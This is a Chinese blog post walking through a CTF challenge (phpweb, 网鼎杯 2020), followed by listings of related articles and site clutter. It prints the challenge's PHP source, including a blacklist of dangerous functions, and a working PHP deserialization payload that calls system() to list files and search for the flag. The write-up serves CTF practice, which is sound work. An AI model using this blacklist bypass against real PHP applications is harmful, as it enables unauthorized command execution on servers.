NO.2-11 [网鼎杯 2020 朱雀组]phpweb

最新推荐文章于 2023-12-04 11:25:57 发布
最新推荐文章于 2023-12-04 11:25:57 发布
阅读量112 收藏
点赞数
分类专栏: BUUCTF 反序列化
原文链接:https://blog.csdn.net/qq_43801002/article/details/107746605
版权

 过程
1.主页面抓包,发现可以传参。执行file_get_contents。可以看到index.php的源代码。里面有一个十分严格的过滤,几乎过滤了所有危险函数。下面是一个类,里面有析构函数,可以考虑到使用反序列化构造命令执行。

<?php
$disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk",  "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
function gettime($func, $p) {
    $result = call_user_func($func, $p);
    $a= gettype($result);
    if ($a == "string") {
        return $result;
    } else {return "";}
}
class Test {
    var $p = "Y-m-d h:i:s a";
    var $func = "date";
    function __destruct() {
        if ($this->func != "") {
            echo gettime($this->func, $this->p);
        }
    }
}
$func = $_REQUEST["func"];
$p = $_REQUEST["p"];

if ($func != null) {
    $func = strtolower($func);
    if (!in_array($func,$disable_fun)) {
        echo gettime($func, $p);
    }else {
        die("Hacker...");
    }
}
?>

 2.反序列化,已经十分熟稔。构造exp。

<?php
class Test {
    var $p = "ls";
    var $func = "system";
    function __destruct() {
        if ($this->func != "") {
            echo gettime($this->func, $this->p);
        }
    }
}

$a=new Test();
echo serialize($a);

确实可以执行成功。

 

 但是找不到flag在哪。构造exp。
func=unserialize&p=O:4:"Test":2:{s:1:"p";s:18:"find / -name flag*";s:4:"func";s:6:"system";}

 

3.直接readfile。 

 

nigo134
关注
专栏目录
[网鼎杯 2020 朱雀]phpweb 1
qq_43618536的博客
07-21 643
[网鼎杯 2020 朱雀]phpweb 1
phpweb抓包教程
03-06
phpweb抓包教程
BUUCTF——phpweb
weixin_45864041的博客
04-17 652
打开题目 可以看到页面上的时间每5秒刷新一次,所以我们直接抓包看页面的数据提交 由页面提交的两个参数可以看到,第一个func是函数名,第二个是传入函数的参数。 所以可以用php的readfile()函数读取index.php的源码。 <?php $disable_fun = array("exec","shell_exec","system","passthru", "proc_open","show_source","phpinfo","popen","dl","eval", "
BUUCTF [网鼎杯 2020 朱雀] Nmap
Senimo
12-09 3784
BUUCTF [网鼎杯 2020 朱雀] Nmap 考点:nmap -oG 写入文件、-iL读取扫描文件 解法:将nmap扫描结果写入文件时加入一句话木马 启动环境: 类似Nmap的功能,一个输入命令行,提示输入ip地址,尝试输入正常内容:127.0.0.1 可以得到回显结果,猜测是命令执行,尝试使用|分隔地址与命令 127.0.0.1 | ls 可以看到|被\转义,尝试使用;: 提示地址错误,尝试了一些其他的命令执行,也无法实现,参考 ...
2020网鼎杯朱雀部分(13/15道题)wp
热门推荐
Y-Y-K的博客
05-18 1万+
2020网鼎杯朱雀部分(13/15道题)wpMisc0x01 签到0x02 key0x03 九宫格0x04 小明的bb86Web0x01 nmap0x02 phpweb反序列化绕黑名单Reverse0x01 go0x02 treeCrypto0x01 simple0x02 RUA0x03 Guess_gamePwn0x01 魔法房间0x02 云盾 首先,感谢zsky,HotSpurzzZ和b0b0se3三位师傅的共同努力,才有了以下的题解,三位师傅的个人博客可在我博客的友链里看到 Misc 0x01 签到
BUUCTF [网鼎杯 2020 朱雀] phpweb
Senimo
12-09 758
BUUCTF [网鼎杯 2020 朱雀] phpweb 考点: 启动环境: 页面有Warning,发现页面存在自动刷新情况,使用BurpSuite抓取数据包:
BUUCTF_Web——[网鼎杯 2020 朱雀]phpweb
Ho1aAs‘s Blog
10-17 634
文章目录解题思路完 解题思路 打开环境,等待一段时间报错 审查源码,发现POST请求,页面也会定时刷新,这里POST了一个函数和变量 在hackbar加载URL 此处将需要运行的函数赋值给func,参数赋值给p,然后POST在服务器执行 那么首先审查网页的php源码 highlight_file(index.php) 得到源码如下: <!DOCTYPE html> <html> <head> <title>phpweb</title&g
[网鼎杯 2020 朱雀]phpweb1
whale_waves的博客
12-04 799
call_user_func函数类似于一种特别的调用函数的方法,它可以调用php内部函数也可以调用用户自定定义的函数。这里我的思路是通过反序列化传入参数绕过网站对func的防护,通过反序列化后执行system函数。call_user_func()这里似乎是利用的这个函数然后执行用户输入的然后去调用内部函数。####这里其实可以通过一个php的特性绕过直接执行命令,但是还是先按着作者的想法来做。随便输了几个函数,他这里就报出了call_user_func()func传输函数,而p则是传输参数的内容。
2020网鼎杯朱雀题目.rar
05-20
含有misc,re,crypto,pwn,webweb题为thinkjava
网鼎2020-朱雀.rar
05-24
【网鼎2020-朱雀】是2020网鼎杯网络安全竞赛中朱雀的相关挑战资料,这个压缩包可能包含了该竞赛的Web类题目。网鼎杯是中国知名的网络安全技术大赛,旨在提升参赛者的网络安全技能,促进网络安全行业的健康发展...
phpweb-[网鼎杯 2020 朱雀]-[BUUCTF]
qwsn
11-23 1998
0x01、Web 1.phpweb-[网鼎杯 2020 朱雀]-[传送门->BUUCTF] 第一步:点击传送门,打开题目环境 观察题目页面: //打开网页观察网页显示动态,发现网页每隔一段时间会刷新一下,说明可能自动间隔一段时间刷新一次,观察网页,网页上会显示一段warning信息,并提示了data()函数。 //利用BurpSuite拦截网页,看一下有什么异常。观察发现网页会传递两个参数,func和p。func对应的值为date,p对应的值为一串时间格式,说明网页可能向后端传递函数名及其对应的参数
【CTF】java反序列-2020-网鼎杯-朱雀-Web-think_java
(∪.∪ )...zzz的博客
06-13 3629
看目录!读代码如何寻找突破口?存在sql注入抓包 注入语句写在数据包里swagger开发接口login输入用户名密码得到返回数据包user current 读代码 如何寻找突破口? 存在sql注入 抓包 注入语句写在数据包里 (这个包抓错了,所以没有显示密码) /common/test/sqlDict dbName=myapp?a=’ union select (select pwd from user)# “tableDescribe”:“ctfhub_8978
Python 实现 LSTM 和 XGBoost 合模型来预测 Apple Inc.(AAPL)股票价格(包含详细的完整的程序
10-06
内容概要:详细演示了使用 Python 中的 LSTM 和 XGBoost 结合来创建股票价格预测模型的方法。该示例介绍了从数据提取到模型优化全过程的操作,并最终通过图形比较预测值和真实值,展示模型的有效性,有助于提高金融投资决策水平和风险管理能力。本项目的亮点之一就是它融合 LSTM 捕获时间关系的强大能力和 XGBoost 在复杂特征之间的建模优势。 适用人群:有Python编程经验的人士以及金融市场投资者和技术分析师。 使用场景及目标:应用于金融市场的投资策略规划,特别是针对需要长期监控、短期交易决策的股票,用于辅助进行市场走势判断和交易决策支持。 额外信息:此外还包括对未来工作的改进建议:加入更多金融技术指标的考量以及使用更高级机器学习模型的可能性。
2019年计算机网络专业学生实习总结(二篇).pdf
10-06
计算机试题试卷课件
222222222222222222222222222222222222222222222
最新发布
10-06
222222222222222222222222222222222222222222222
2020年计算机机试和笔试01至考试题.pdf
10-06
计算机试题试卷课件
2019年计算机项目实训总结.pdf
10-06
计算机试题试卷课件
[网鼎杯 2020 朱雀]phpweb
03-16
phpweb是一种基于PHP语言开发的Web应用程序框架,它提供了一系列的工具和函数库,使得开发者可以更加高效地构建Web应用程序。phpweb具有易于学习、易于使用、易于扩展等特点,因此在Web应用程序开发中得到了广泛的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值